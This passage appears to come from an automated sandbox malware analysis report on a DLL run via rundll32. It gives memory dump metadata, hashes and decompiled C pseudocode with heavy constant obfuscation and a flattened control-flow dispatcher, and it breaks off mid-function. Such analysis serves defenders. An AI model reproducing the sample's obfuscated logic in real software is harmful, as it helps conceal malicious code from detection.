                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                                  • API String ID: 0-1604698900
                                                                                                                                  • Opcode ID: 07c2f298ae15722ece1c17feda694d2c26b3b4279983856fc627f232ed47ac51
                                                                                                                                  • Instruction ID: a04e4b476d9659372ca4b9a9f2f393ed83ddacead2c63b4d6114e1120e8338c7
                                                                                                                                  • Opcode Fuzzy Hash: 07c2f298ae15722ece1c17feda694d2c26b3b4279983856fc627f232ed47ac51
                                                                                                                                  • Instruction Fuzzy Hash: 30F10E714087819FD368CF66D589A5BBBF1FB84B48F50891DF29A86260D7B28859CF03
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Version$ClipboardFormatRegister
                                                                                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                                                                                  • API String ID: 2888461884-2485103130
                                                                                                                                  • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                  • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                                  • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                  • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E002ECB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				char _v1560;
                                                                                                                                  				intOrPtr _v1564;
                                                                                                                                  				intOrPtr _v1568;
                                                                                                                                  				intOrPtr _v1572;
                                                                                                                                  				signed int _v1576;
                                                                                                                                  				signed int _v1580;
                                                                                                                                  				signed int _v1584;
                                                                                                                                  				signed int _v1588;
                                                                                                                                  				signed int _v1592;
                                                                                                                                  				signed int _v1596;
                                                                                                                                  				signed int _v1600;
                                                                                                                                  				signed int _v1604;
                                                                                                                                  				signed int _v1608;
                                                                                                                                  				signed int _v1612;
                                                                                                                                  				signed int _v1616;
                                                                                                                                  				signed int _v1620;
                                                                                                                                  				signed int _v1624;
                                                                                                                                  				signed int _v1628;
                                                                                                                                  				signed int _v1632;
                                                                                                                                  				signed int _v1636;
                                                                                                                                  				signed int _v1640;
                                                                                                                                  				signed int _v1644;
                                                                                                                                  				signed int _v1648;
                                                                                                                                  				signed int _v1652;
                                                                                                                                  				signed int _v1656;
                                                                                                                                  				signed int _v1660;
                                                                                                                                  				signed int _v1664;
                                                                                                                                  				signed int _v1668;
                                                                                                                                  				signed int _v1672;
                                                                                                                                  				signed int _v1676;
                                                                                                                                  				signed int _v1680;
                                                                                                                                  				signed int _v1684;
                                                                                                                                  				signed int _v1688;
                                                                                                                                  				signed int _v1692;
                                                                                                                                  				signed int _v1696;
                                                                                                                                  				signed int _v1700;
                                                                                                                                  				signed int _v1704;
                                                                                                                                  				signed int _v1708;
                                                                                                                                  				void* _t341;
                                                                                                                                  				void* _t370;
                                                                                                                                  				void* _t379;
                                                                                                                                  				intOrPtr _t382;
                                                                                                                                  				intOrPtr _t385;
                                                                                                                                  				void* _t396;
                                                                                                                                  				intOrPtr _t399;
                                                                                                                                  				intOrPtr _t436;
                                                                                                                                  				signed int _t437;
                                                                                                                                  				signed int _t438;
                                                                                                                                  				signed int _t439;
                                                                                                                                  				signed int _t440;
                                                                                                                                  				signed int _t441;
                                                                                                                                  				signed int _t442;
                                                                                                                                  				signed int _t443;
                                                                                                                                  				signed int _t444;
                                                                                                                                  				signed int* _t449;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_t436 = 0;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(0);
                                                                                                                                  				E002E20B9(_t341);
                                                                                                                                  				_v1572 = 0xe82680;
                                                                                                                                  				_t449 =  &(( &_v1708)[5]);
                                                                                                                                  				_v1568 = 0;
                                                                                                                                  				_v1564 = 0;
                                                                                                                                  				_t396 = 0x9368da1;
                                                                                                                                  				_v1584 = 0x42403b;
                                                                                                                                  				_v1584 = _v1584 + 0xffffd771;
                                                                                                                                  				_v1584 = _v1584 ^ 0x00421785;
                                                                                                                                  				_v1692 = 0xc00255;
                                                                                                                                  				_t437 = 0x16;
                                                                                                                                  				_v1692 = _v1692 / _t437;
                                                                                                                                  				_v1692 = _v1692 + 0xffff6b87;
                                                                                                                                  				_v1692 = _v1692 + 0xffff176e;
                                                                                                                                  				_v1692 = _v1692 ^ 0x0004c90f;
                                                                                                                                  				_v1668 = 0x5abcaa;
                                                                                                                                  				_v1668 = _v1668 | 0xa6adf3e3;
                                                                                                                                  				_v1668 = _v1668 + 0xffff713c;
                                                                                                                                  				_v1668 = _v1668 << 6;
                                                                                                                                  				_v1668 = _v1668 ^ 0xbfd49dc8;
                                                                                                                                  				_v1700 = 0xb35187;
                                                                                                                                  				_v1700 = _v1700 | 0x50a44dff;
                                                                                                                                  				_v1700 = _v1700 + 0xfffff2e6;
                                                                                                                                  				_v1700 = _v1700 >> 8;
                                                                                                                                  				_v1700 = _v1700 ^ 0x0051b9c1;
                                                                                                                                  				_v1644 = 0x4d7cc3;
                                                                                                                                  				_v1644 = _v1644 + 0xffffa786;
                                                                                                                                  				_v1644 = _v1644 | 0x8b8a715e;
                                                                                                                                  				_v1644 = _v1644 ^ 0x6234f021;
                                                                                                                                  				_v1644 = _v1644 ^ 0xe9f998a6;
                                                                                                                                  				_v1624 = 0x204c5b;
                                                                                                                                  				_v1624 = _v1624 + 0xffffa901;
                                                                                                                                  				_v1624 = _v1624 + 0x49e1;
                                                                                                                                  				_v1624 = _v1624 ^ 0x002fe6aa;
                                                                                                                                  				_v1632 = 0xbb0a9b;
                                                                                                                                  				_v1632 = _v1632 * 0x52;
                                                                                                                                  				_v1632 = _v1632 | 0x83893080;
                                                                                                                                  				_v1632 = _v1632 ^ 0xbbe905c0;
                                                                                                                                  				_v1620 = 0x19fb1a;
                                                                                                                                  				_v1620 = _v1620 | 0x985eae3d;
                                                                                                                                  				_v1620 = _v1620 + 0xf613;
                                                                                                                                  				_v1620 = _v1620 ^ 0x9864c971;
                                                                                                                                  				_v1656 = 0x35ecb4;
                                                                                                                                  				_v1656 = _v1656 * 0x29;
                                                                                                                                  				_v1656 = _v1656 + 0x1081;
                                                                                                                                  				_v1656 = _v1656 + 0xffffd324;
                                                                                                                                  				_v1656 = _v1656 ^ 0x08a8fe56;
                                                                                                                                  				_v1580 = 0xc60f6f;
                                                                                                                                  				_v1580 = _v1580 + 0xffffd3e6;
                                                                                                                                  				_v1580 = _v1580 ^ 0x00c233ea;
                                                                                                                                  				_v1664 = 0x2df5c;
                                                                                                                                  				_v1664 = _v1664 << 8;
                                                                                                                                  				_v1664 = _v1664 * 0x4c;
                                                                                                                                  				_v1664 = _v1664 + 0xffffaed7;
                                                                                                                                  				_v1664 = _v1664 ^ 0xda40187b;
                                                                                                                                  				_v1672 = 0x38409b;
                                                                                                                                  				_v1672 = _v1672 * 0x33;
                                                                                                                                  				_v1672 = _v1672 | 0x7fcdffbb;
                                                                                                                                  				_v1672 = _v1672 ^ 0x7ff87770;
                                                                                                                                  				_v1680 = 0xe751cb;
                                                                                                                                  				_v1680 = _v1680 ^ 0x8590ed7d;
                                                                                                                                  				_v1680 = _v1680 + 0xffffebc9;
                                                                                                                                  				_v1680 = _v1680 * 0x5e;
                                                                                                                                  				_v1680 = _v1680 ^ 0x01e2719c;
                                                                                                                                  				_v1688 = 0x15e1cd;
                                                                                                                                  				_v1688 = _v1688 + 0xfe19;
                                                                                                                                  				_v1688 = _v1688 + 0xffffc88c;
                                                                                                                                  				_v1688 = _v1688 << 7;
                                                                                                                                  				_v1688 = _v1688 ^ 0x0b5f3deb;
                                                                                                                                  				_v1696 = 0x33a377;
                                                                                                                                  				_v1696 = _v1696 << 0xa;
                                                                                                                                  				_v1696 = _v1696 ^ 0xfb2d04b5;
                                                                                                                                  				_v1696 = _v1696 | 0xd2f07883;
                                                                                                                                  				_v1696 = _v1696 ^ 0xf7fa7ce3;
                                                                                                                                  				_v1640 = 0x94004d;
                                                                                                                                  				_v1640 = _v1640 >> 0xa;
                                                                                                                                  				_t438 = 0x67;
                                                                                                                                  				_v1640 = _v1640 * 0x3d;
                                                                                                                                  				_v1640 = _v1640 >> 7;
                                                                                                                                  				_v1640 = _v1640 ^ 0x00039ca1;
                                                                                                                                  				_v1648 = 0xfcfef3;
                                                                                                                                  				_v1648 = _v1648 * 0x18;
                                                                                                                                  				_v1648 = _v1648 + 0x9c71;
                                                                                                                                  				_v1648 = _v1648 | 0xf5d6202a;
                                                                                                                                  				_v1648 = _v1648 ^ 0xf7f57601;
                                                                                                                                  				_v1596 = 0xc58f80;
                                                                                                                                  				_v1596 = _v1596 + 0xffff2f17;
                                                                                                                                  				_v1596 = _v1596 ^ 0x00ce700d;
                                                                                                                                  				_v1684 = 0xee980b;
                                                                                                                                  				_v1684 = _v1684 >> 6;
                                                                                                                                  				_v1684 = _v1684 / _t438;
                                                                                                                                  				_v1684 = _v1684 + 0xffff2a3f;
                                                                                                                                  				_v1684 = _v1684 ^ 0xfff3655c;
                                                                                                                                  				_v1652 = 0x45a4a9;
                                                                                                                                  				_v1652 = _v1652 >> 0xe;
                                                                                                                                  				_t439 = 0x6e;
                                                                                                                                  				_v1652 = _v1652 * 0x51;
                                                                                                                                  				_v1652 = _v1652 + 0x9be3;
                                                                                                                                  				_v1652 = _v1652 ^ 0x0004d4d8;
                                                                                                                                  				_v1708 = 0x222243;
                                                                                                                                  				_t176 =  &_v1708; // 0x222243
                                                                                                                                  				_v1708 =  *_t176 / _t439;
                                                                                                                                  				_v1708 = _v1708 << 9;
                                                                                                                                  				_v1708 = _v1708 + 0xffff4a12;
                                                                                                                                  				_v1708 = _v1708 ^ 0x009b5339;
                                                                                                                                  				_v1612 = 0x464ea3;
                                                                                                                                  				_v1612 = _v1612 + 0x89cc;
                                                                                                                                  				_v1612 = _v1612 >> 2;
                                                                                                                                  				_v1612 = _v1612 ^ 0x00167067;
                                                                                                                                  				_v1588 = 0xd74d9e;
                                                                                                                                  				_v1588 = _v1588 | 0x529da741;
                                                                                                                                  				_v1588 = _v1588 ^ 0x52d09c78;
                                                                                                                                  				_v1628 = 0x60b5eb;
                                                                                                                                  				_v1628 = _v1628 >> 9;
                                                                                                                                  				_t440 = 0x19;
                                                                                                                                  				_v1628 = _v1628 / _t440;
                                                                                                                                  				_v1628 = _v1628 ^ 0x000ff1bc;
                                                                                                                                  				_v1676 = 0xfb7b01;
                                                                                                                                  				_v1676 = _v1676 << 4;
                                                                                                                                  				_v1676 = _v1676 + 0xffffc28e;
                                                                                                                                  				_t441 = 0x1b;
                                                                                                                                  				_v1676 = _v1676 / _t441;
                                                                                                                                  				_v1676 = _v1676 ^ 0x0096cb21;
                                                                                                                                  				_v1660 = 0xed67c1;
                                                                                                                                  				_v1660 = _v1660 << 0xa;
                                                                                                                                  				_v1660 = _v1660 | 0xef7d69c8;
                                                                                                                                  				_v1660 = _v1660 << 2;
                                                                                                                                  				_v1660 = _v1660 ^ 0xfff42fe1;
                                                                                                                                  				_v1604 = 0x46c7e8;
                                                                                                                                  				_v1604 = _v1604 << 0xf;
                                                                                                                                  				_v1604 = _v1604 ^ 0x63fe3710;
                                                                                                                                  				_v1636 = 0x7a345b;
                                                                                                                                  				_v1636 = _v1636 + 0xd479;
                                                                                                                                  				_v1636 = _v1636 + 0x8c7f;
                                                                                                                                  				_v1636 = _v1636 ^ 0x00708a00;
                                                                                                                                  				_v1704 = 0x80508e;
                                                                                                                                  				_v1704 = _v1704 ^ 0xf958081f;
                                                                                                                                  				_t442 = 0x4b;
                                                                                                                                  				_v1704 = _v1704 / _t442;
                                                                                                                                  				_t443 = 0x34;
                                                                                                                                  				_v1704 = _v1704 * 0x44;
                                                                                                                                  				_v1704 = _v1704 ^ 0xe2885afb;
                                                                                                                                  				_v1576 = 0x325f4f;
                                                                                                                                  				_t259 =  &_v1576; // 0x325f4f
                                                                                                                                  				_v1576 =  *_t259 * 0x7a;
                                                                                                                                  				_v1576 = _v1576 ^ 0x180920ed;
                                                                                                                                  				_v1592 = 0xd554f9;
                                                                                                                                  				_v1592 = _v1592 * 0x4e;
                                                                                                                                  				_v1592 = _v1592 ^ 0x40f8e8dd;
                                                                                                                                  				_v1608 = 0x6be570;
                                                                                                                                  				_v1608 = _v1608 + 0x3d4f;
                                                                                                                                  				_v1608 = _v1608 ^ 0x4461575c;
                                                                                                                                  				_v1608 = _v1608 ^ 0x440eeedf;
                                                                                                                                  				_v1616 = 0x4acfbf;
                                                                                                                                  				_v1616 = _v1616 / _t443;
                                                                                                                                  				_t444 = 0xe;
                                                                                                                                  				_v1616 = _v1616 / _t444;
                                                                                                                                  				_v1616 = _v1616 ^ 0x000fdd65;
                                                                                                                                  				_v1600 = 0x55de88;
                                                                                                                                  				_v1600 = _v1600 << 2;
                                                                                                                                  				_v1600 = _v1600 ^ 0x01580110;
                                                                                                                                  				do {
                                                                                                                                  					while(_t396 != 0x196a97b) {
                                                                                                                                  						if(_t396 == 0x2ca432c) {
                                                                                                                                  							_push(_v1652);
                                                                                                                                  							_push(_v1684);
                                                                                                                                  							_t379 = E002EDCF7(_v1596, 0x2d10f0, __eflags);
                                                                                                                                  							E002E176B( &_v1560, __eflags);
                                                                                                                                  							_t382 =  *0x2f3e10; // 0x0
                                                                                                                                  							_t385 =  *0x2f3e10; // 0x0
                                                                                                                                  							E002EE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
                                                                                                                                  							E002DA8B0(_v1704, _t379, _v1576);
                                                                                                                                  							_t449 =  &(_t449[0xf]);
                                                                                                                                  							_t396 = 0x9d0e956;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t396 == 0x9368da1) {
                                                                                                                                  								_push(_v1644);
                                                                                                                                  								_push(_v1584);
                                                                                                                                  								_push(_v1700);
                                                                                                                                  								_push( &_v1040);
                                                                                                                                  								E002E46BB(_v1692, _v1668);
                                                                                                                                  								_t449 = _t449 - 0xc + 0x1c;
                                                                                                                                  								_t396 = 0x196a97b;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								_t456 = _t396 - 0x9d0e956;
                                                                                                                                  								if(_t396 != 0x9d0e956) {
                                                                                                                                  									goto L10;
                                                                                                                                  								} else {
                                                                                                                                  									_push(_v1600);
                                                                                                                                  									_push(_t436);
                                                                                                                                  									_push(_t396);
                                                                                                                                  									_push(_t436);
                                                                                                                                  									_push(_t436);
                                                                                                                                  									_push(_v1616);
                                                                                                                                  									_push( &_v520);
                                                                                                                                  									E002DAB87(_v1592, _v1608, _t456);
                                                                                                                                  									_t436 =  !=  ? 1 : _t436;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L6:
                                                                                                                                  						return _t436;
                                                                                                                                  					}
                                                                                                                                  					_push(_v1620);
                                                                                                                                  					_push(_v1632);
                                                                                                                                  					_t370 = E002EDCF7(_v1624, 0x2d1020, __eflags);
                                                                                                                                  					E002E176B( &_v1560, __eflags);
                                                                                                                                  					_t399 =  *0x2f3e10; // 0x0
                                                                                                                                  					_t336 = _t399 + 0x1c; // 0x1c
                                                                                                                                  					_t337 = _t399 + 0x23c; // 0x23c
                                                                                                                                  					E002E1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
                                                                                                                                  					E002DA8B0(_v1640, _t370, _v1648);
                                                                                                                                  					_t449 =  &(_t449[0xf]);
                                                                                                                                  					_t396 = 0x9d0e956;
                                                                                                                                  					L10:
                                                                                                                                  					__eflags = _t396 - 0xce3b296;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L6;
                                                                                                                                  			}

                                                                                                                                  0x002ed0b4
                                                                                                                                  0x002ed0b5
                                                                                                                                  0x002ed0ca
                                                                                                                                  0x002ed0cb
                                                                                                                                  0x002ed0d8
                                                                                                                                  0x002ed0d8
                                                                                                                                  0x002ed0a0
                                                                                                                                  0x002ed09c
                                                                                                                                  0x002ed0db
                                                                                                                                  0x002ed0e7
                                                                                                                                  0x002ed0e7
                                                                                                                                  0x002ed1bc
                                                                                                                                  0x002ed1c5
                                                                                                                                  0x002ed1cd
                                                                                                                                  0x002ed1db
                                                                                                                                  0x002ed212
                                                                                                                                  0x002ed21f
                                                                                                                                  0x002ed223
                                                                                                                                  0x002ed22e
                                                                                                                                  0x002ed243
                                                                                                                                  0x002ed248
                                                                                                                                  0x002ed24b
                                                                                                                                  0x002ed24d
                                                                                                                                  0x002ed24d
                                                                                                                                  0x002ed24d
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                                  • API String ID: 1514166925-553023378
                                                                                                                                  • Opcode ID: c79c7f0a3b62858e2ce2356689008d71880f4429e76d3e390215c5a3e73c017c
                                                                                                                                  • Instruction ID: b868e704945e0b3bae0e96f007610414d81534337c535ee1363e97db3fff9df1
                                                                                                                                  • Opcode Fuzzy Hash: c79c7f0a3b62858e2ce2356689008d71880f4429e76d3e390215c5a3e73c017c
                                                                                                                                  • Instruction Fuzzy Hash: 05022EB14083819FD364CF26C98AA9BFBE1FBC4718F50891DF1D986260D7B1895ACF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D70B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				void* _t276;
                                                                                                                                  				intOrPtr _t301;
                                                                                                                                  				void* _t302;
                                                                                                                                  				intOrPtr _t305;
                                                                                                                                  				void* _t306;
                                                                                                                                  				intOrPtr _t312;
                                                                                                                                  				intOrPtr* _t314;
                                                                                                                                  				void* _t316;
                                                                                                                                  				intOrPtr _t340;
                                                                                                                                  				signed int _t343;
                                                                                                                                  				signed int _t344;
                                                                                                                                  				signed int _t345;
                                                                                                                                  				signed int _t346;
                                                                                                                                  				signed int _t347;
                                                                                                                                  				signed int _t348;
                                                                                                                                  				signed int _t349;
                                                                                                                                  				signed int* _t352;
                                                                                                                                  
                                                                                                                                  				_t342 = _a4;
                                                                                                                                  				_t314 = __edx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t276);
                                                                                                                                  				_v8 = 0xc5496b;
                                                                                                                                  				_t340 = 0;
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_t352 =  &(( &_v128)[5]);
                                                                                                                                  				_v96 = 0xa893e5;
                                                                                                                                  				_v96 = _v96 >> 0xb;
                                                                                                                                  				_t316 = 0x77ea95;
                                                                                                                                  				_v96 = _v96 ^ 0xaec74c08;
                                                                                                                                  				_v96 = _v96 + 0xffff5908;
                                                                                                                                  				_v96 = _v96 ^ 0xaec6b223;
                                                                                                                                  				_v120 = 0x460837;
                                                                                                                                  				_v120 = _v120 << 0xe;
                                                                                                                                  				_t343 = 0x61;
                                                                                                                                  				_v120 = _v120 / _t343;
                                                                                                                                  				_v120 = _v120 ^ 0xba448c5d;
                                                                                                                                  				_v120 = _v120 ^ 0xbb13b056;
                                                                                                                                  				_v100 = 0x5f60bb;
                                                                                                                                  				_t344 = 0x67;
                                                                                                                                  				_v100 = _v100 / _t344;
                                                                                                                                  				_v100 = _v100 << 2;
                                                                                                                                  				_v100 = _v100 << 0xe;
                                                                                                                                  				_v100 = _v100 ^ 0xed0e0000;
                                                                                                                                  				_v104 = 0xcda695;
                                                                                                                                  				_t345 = 0x65;
                                                                                                                                  				_v104 = _v104 * 0x11;
                                                                                                                                  				_v104 = _v104 + 0xffffbfc8;
                                                                                                                                  				_v104 = _v104 / _t345;
                                                                                                                                  				_v104 = _v104 ^ 0x00229cab;
                                                                                                                                  				_v88 = 0xcb9151;
                                                                                                                                  				_v88 = _v88 + 0x59e9;
                                                                                                                                  				_v88 = _v88 ^ 0x7c8ac0da;
                                                                                                                                  				_v88 = _v88 >> 0xc;
                                                                                                                                  				_v88 = _v88 ^ 0x0007c412;
                                                                                                                                  				_v124 = 0xc27732;
                                                                                                                                  				_v124 = _v124 << 5;
                                                                                                                                  				_v124 = _v124 * 0x69;
                                                                                                                                  				_v124 = _v124 >> 0xd;
                                                                                                                                  				_v124 = _v124 ^ 0x0007c2e3;
                                                                                                                                  				_v108 = 0xd451e;
                                                                                                                                  				_v108 = _v108 | 0x03d9c36b;
                                                                                                                                  				_v108 = _v108 << 0x10;
                                                                                                                                  				_v108 = _v108 >> 7;
                                                                                                                                  				_v108 = _v108 ^ 0x018efe00;
                                                                                                                                  				_v24 = 0xe3266e;
                                                                                                                                  				_v24 = _v24 ^ 0xb39ac5a6;
                                                                                                                                  				_v24 = _v24 ^ 0xb37ebd00;
                                                                                                                                  				_v60 = 0xdd6dbc;
                                                                                                                                  				_v60 = _v60 << 0xc;
                                                                                                                                  				_v60 = _v60 >> 0xd;
                                                                                                                                  				_v60 = _v60 ^ 0x00066ea0;
                                                                                                                                  				_v92 = 0xdc27c1;
                                                                                                                                  				_v92 = _v92 ^ 0xb7b3afa8;
                                                                                                                                  				_t346 = 0x51;
                                                                                                                                  				_v92 = _v92 / _t346;
                                                                                                                                  				_v92 = _v92 >> 0xb;
                                                                                                                                  				_v92 = _v92 ^ 0x000e15f4;
                                                                                                                                  				_v28 = 0x55985f;
                                                                                                                                  				_t347 = 0x64;
                                                                                                                                  				_v28 = _v28 * 0x1f;
                                                                                                                                  				_v28 = _v28 ^ 0x0a58c7ef;
                                                                                                                                  				_v64 = 0x4cb0ae;
                                                                                                                                  				_v64 = _v64 * 0x59;
                                                                                                                                  				_v64 = _v64 + 0xffff44f7;
                                                                                                                                  				_v64 = _v64 ^ 0x1aa02a50;
                                                                                                                                  				_v32 = 0x4c255b;
                                                                                                                                  				_v32 = _v32 >> 0xc;
                                                                                                                                  				_v32 = _v32 ^ 0x000ba021;
                                                                                                                                  				_v68 = 0x1bdf1a;
                                                                                                                                  				_v68 = _v68 << 0xe;
                                                                                                                                  				_v68 = _v68 << 8;
                                                                                                                                  				_v68 = _v68 ^ 0xc683e60f;
                                                                                                                                  				_v36 = 0xeace7c;
                                                                                                                                  				_v36 = _v36 ^ 0x32d1e31b;
                                                                                                                                  				_v36 = _v36 ^ 0x32395a0e;
                                                                                                                                  				_v52 = 0x5778bf;
                                                                                                                                  				_v52 = _v52 * 0x53;
                                                                                                                                  				_v52 = _v52 ^ 0x1c501c28;
                                                                                                                                  				_v56 = 0x56e07;
                                                                                                                                  				_v56 = _v56 / _t347;
                                                                                                                                  				_v56 = _v56 ^ 0x000a0e4e;
                                                                                                                                  				_v128 = 0x2ec397;
                                                                                                                                  				_v128 = _v128 + 0xffff4016;
                                                                                                                                  				_v128 = _v128 ^ 0xc29a5f5c;
                                                                                                                                  				_v128 = _v128 << 0xa;
                                                                                                                                  				_v128 = _v128 ^ 0xd1754ce1;
                                                                                                                                  				_v112 = 0x486dea;
                                                                                                                                  				_t159 =  &_v112; // 0x486dea
                                                                                                                                  				_t348 = 0x16;
                                                                                                                                  				_v112 =  *_t159 * 0x75;
                                                                                                                                  				_v112 = _v112 << 3;
                                                                                                                                  				_v112 = _v112 + 0xffff4e4a;
                                                                                                                                  				_v112 = _v112 ^ 0x08d01f1a;
                                                                                                                                  				_v116 = 0xad5672;
                                                                                                                                  				_v116 = _v116 << 0xa;
                                                                                                                                  				_v116 = _v116 * 0x32;
                                                                                                                                  				_v116 = _v116 >> 1;
                                                                                                                                  				_v116 = _v116 ^ 0x35c1a461;
                                                                                                                                  				_v40 = 0x750aef;
                                                                                                                                  				_v40 = _v40 << 0xe;
                                                                                                                                  				_v40 = _v40 ^ 0x42b6a378;
                                                                                                                                  				_v72 = 0x7e8fee;
                                                                                                                                  				_v72 = _v72 << 0xe;
                                                                                                                                  				_v72 = _v72 + 0x885b;
                                                                                                                                  				_v72 = _v72 ^ 0xa3f43c0d;
                                                                                                                                  				_v44 = 0x717d1a;
                                                                                                                                  				_v44 = _v44 >> 0xf;
                                                                                                                                  				_v44 = _v44 ^ 0x000f68d6;
                                                                                                                                  				_v48 = 0x815897;
                                                                                                                                  				_v48 = _v48 / _t348;
                                                                                                                                  				_v48 = _v48 ^ 0x000d4a68;
                                                                                                                                  				_v76 = 0xfbb4ce;
                                                                                                                                  				_v76 = _v76 << 8;
                                                                                                                                  				_v76 = _v76 + 0xffffed69;
                                                                                                                                  				_v76 = _v76 ^ 0xfbbe0169;
                                                                                                                                  				_v80 = 0xf07394;
                                                                                                                                  				_v80 = _v80 << 0xf;
                                                                                                                                  				_v80 = _v80 ^ 0x34c45092;
                                                                                                                                  				_v80 = _v80 ^ 0x0d009df4;
                                                                                                                                  				_v84 = 0xfdde74;
                                                                                                                                  				_v84 = _v84 * 0x78;
                                                                                                                                  				_v84 = _v84 << 7;
                                                                                                                                  				_v84 = _v84 << 0xa;
                                                                                                                                  				_v84 = _v84 ^ 0x8cc67a91;
                                                                                                                                  				_v20 = 0xbaf80d;
                                                                                                                                  				_t349 = 0x4e;
                                                                                                                                  				_v20 = _v20 / _t349;
                                                                                                                                  				_v20 = _v20 ^ 0x000183d9;
                                                                                                                                  				do {
                                                                                                                                  					while(_t316 != 0x77ea95) {
                                                                                                                                  						if(_t316 == 0x220b753) {
                                                                                                                                  							_t301 =  *0x2f3dfc; // 0x0
                                                                                                                                  							_t302 = E002E5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
                                                                                                                                  							_t352 =  &(_t352[0x10]);
                                                                                                                                  							if(_t302 == _v88) {
                                                                                                                                  								_t316 = 0xd86d689;
                                                                                                                                  								continue;
